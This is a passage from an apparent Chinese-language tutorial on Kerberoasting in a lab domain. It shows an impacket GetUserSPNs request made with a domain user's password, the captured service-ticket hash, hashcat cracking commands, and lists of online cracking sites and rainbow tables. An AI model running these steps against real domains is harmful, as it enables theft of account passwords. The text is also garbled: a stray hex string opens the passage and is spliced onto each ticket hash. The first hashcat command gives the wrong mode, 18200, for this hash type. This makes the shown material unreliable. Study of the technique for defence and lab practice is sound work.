87249376357bd7cd7db1ee5ef5043d7c842d53166433b147b08c7f3cc1ff0b6d02055a4e30ffff808012b5dac7cd8d0cec3629172a354efa814b577691bc85b8677f68161907797084084a3407ef269a5631ecfc4c0ca9f2b216d
# Crack with Hashcat
$krb5tgs$23$*three$NPC.COM$npc.com/three*$7e991b6110f0b716bc0d8cdb55baba2b$2bcb6a1485d038098b91fcdc335bf149c958571c6d9f8650f946c1cf95c6828fccce957e63fc9da609771bd3c2e3a836dd292fc51d7c6101582dd6362a959a66d0e29dfeea06b313c168ee2fbb323c37a5dd7e4a3e21acb7d8526503cbaf802158d599c646513a80ace8a7c699a7456d46ad6419cbffbf36f602716a155a54d4d98f7d755a83d26950606ecfb276c187821dfa7320aa356c7d03a9165d12b4a04ab70aef9d671692dcc5771eb76d522e9a2367e79a7ac1dbbae333041499e5b6575996810048e85399c90aef3f4820513a554993aa84bbeed7c9dc0128e5ff6ca14811733de29b871fff01d8e487e187f101f64349d357f792072313bacbbd3d3514883b893b20ece25ebd1789af52b97b5f9101976813c8c0859b5abfbaa62c6058701bcd4cc2984320e1cc081f4311b643f13788cb141af9b4002de5a3e78b89200730cfe4d9b8757ec1026fd68423ae3bcfeb7c85a518bb6d7abb1d4414920f093116f1564643eac9a8fb8ba7f3c57f35a7b9e9677ab50f79f7277cebeeb2037ea0865020be8576081d23923cdbe7d7c2075027f9fd092a760cde80c280e3edb988a31c9e48eaa69f9491f11fa6d4c5aa5856af4814b2862579cd8bb3b8952b1e1f6094670ffcfa3879f970054ac2cf9ffc4f0c0a10540bb60850994a12441c2d7bc28821d59b262a2841814c98958eb924280755d73d6668a02058d8dea9081656414a88b7508aeb4cea377fd8ca9a6fa93c43bd6054dbffc4fe1af47b223adc67ba5e1f1ce2ec05b75c71ee69157d3e456759ec2063001e20bc412ff7628734a9a77fd5f1c465a81c55055f06402ed7a05346fffaba87c3965bfcea8f8bf657ba5c2e1dca96ddab1d5b447e5995409460c58eab1def4030ce2e09d6d5b0c1ec1b01ac29670b3fab9b06f16aaebc7bfd89dfe7d1f509f7dae8e129a4b90c98e13559b5401e3531c7b93c14f424f9088033cb8ed9908b6cb113ec1290faa0ef665c0cdcd9fea05376ad5fb3345e1d353ef8d692f12a67282e26757f08d331ef1c6a85f442c0cc2e030e2ff83eccbd039fd0a185f275e23cc1d652d7d8db38e7abdaaf1682c269e8dab81d33a09f605c68d4bdab1a883c8087787249376357bd7cd7db1ee5ef5043d7c842d53166433b147b08c7f3cc1ff0b6d02055a4e30ffff808012b5dac7cd8d0cec3629172a354efa814b577691bc85b8677f68161907797084084a3407ef269a5631ecfc4c0ca9f2b216d
-----
hashcat -m 18200 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt --show

Kerberoasting 攻击

通过 impacket 查询域内注册于域用户下的 SPN,请求指定 SPN 的 ST:

python GetUserSPNs.py npc.com/three:Hello33 -dc-ip 192.168.111.146 -request
Impacket v0.12.0.dev1+20230909.154612.3beeda7 - Copyright 2023 Fortra

ServicePrincipalName  Name   MemberOf  PasswordLastSet             LastLogon                   Delegation
--------------------  -----  --------  --------------------------  --------------------------  ----------
HTTP/npc.com          three            2024-11-01 18:06:59.474634  2024-11-04 09:13:45.119428

[-] CCache file is not found. Skipping...
$krb5tgs$23$*three$NPC.COM$npc.com/three*$7e991b6110f0b716bc0d8cdb55baba2b$2bcb6a1485d038098b91fcdc335bf149c958571c6d9f8650f946c1cf95c6828fccce957e63fc9da609771bd3c2e3a836dd292fc51d7c6101582dd6362a959a66d0e29dfeea06b313c168ee2fbb323c37a5dd7e4a3e21acb7d8526503cbaf802158d599c646513a80ace8a7c699a7456d46ad6419cbffbf36f602716a155a54d4d98f7d755a83d26950606ecfb276c187821dfa7320aa356c7d03a9165d12b4a04ab70aef9d671692dcc5771eb76d522e9a2367e79a7ac1dbbae333041499e5b6575996810048e85399c90aef3f4820513a554993aa84bbeed7c9dc0128e5ff6ca14811733de29b871fff01d8e487e187f101f64349d357f792072313bacbbd3d3514883b893b20ece25ebd1789af52b97b5f9101976813c8c0859b5abfbaa62c6058701bcd4cc2984320e1cc081f4311b643f13788cb141af9b4002de5a3e78b89200730cfe4d9b8757ec1026fd68423ae3bcfeb7c85a518bb6d7abb1d4414920f093116f1564643eac9a8fb8ba7f3c57f35a7b9e9677ab50f79f7277cebeeb2037ea0865020be8576081d23923cdbe7d7c2075027f9fd092a760cde80c280e3edb988a31c9e48eaa69f9491f11fa6d4c5aa5856af4814b2862579cd8bb3b8952b1e1f6094670ffcfa3879f970054ac2cf9ffc4f0c0a10540bb60850994a12441c2d7bc28821d59b262a2841814c98958eb924280755d73d6668a02058d8dea9081656414a88b7508aeb4cea377fd8ca9a6fa93c43bd6054dbffc4fe1af47b223adc67ba5e1f1ce2ec05b75c71ee69157d3e456759ec2063001e20bc412ff7628734a9a77fd5f1c465a81c55055f06402ed7a05346fffaba87c3965bfcea8f8bf657ba5c2e1dca96ddab1d5b447e5995409460c58eab1def4030ce2e09d6d5b0c1ec1b01ac29670b3fab9b06f16aaebc7bfd89dfe7d1f509f7dae8e129a4b90c98e13559b5401e3531c7b93c14f424f9088033cb8ed9908b6cb113ec1290faa0ef665c0cdcd9fea05376ad5fb3345e1d353ef8d692f12a67282e26757f08d331ef1c6a85f442c0cc2e030e2ff83eccbd039fd0a185f275e23cc1d652d7d8db38e7abdaaf1682c269e8dab81d33a09f605c68d4bdab1a883c8087787249376357bd7cd7db1ee5ef5043d7c842d53166433b147b08c7f3cc1ff0b6d02055a4e30ffff808012b5dac7cd8d0cec3629172a354efa814b577691bc85b8677f68161907797084084a3407ef269a5631ecfc4c0ca9f2b216d

用 Hashcat 进行破解:

# Crack with Hashcat
hashcat -a 0 -m 13100 hashes.txt ~/HackTools/Dict/rockyou.txt

对应的攻击流量如下,重点关注 SNameString

附录

工具

离线破解工具:

# Offline hash cracker
https://hashcat.net/hashcat/
https://github.com/openwall/john

在线破解工具:

# Online hash cracker
https://www.cmd5.org/
https://www.somd5.com/
https://www.onlinehashcrack.com/
https://crackstation.net/
https://crack.sh/
https://passwordrecovery.io/
https://md5decrypt.net/en/Sha256/
https://hashes.com/en/decrypt/hash

# NetNTLMv1 online cracker
https://ntlmv1.com/

彩虹表:

# LM + NTLM hashes and corresponding plaintext passwords:
https://openwall.info/wiki/_media/john/pw-fake-nt.gz 3107
https://openwall.info/wiki/_media/john/pw-fake-nt100k.gz 100k

参考阅读

1 条评论
某人
表情
可输入 255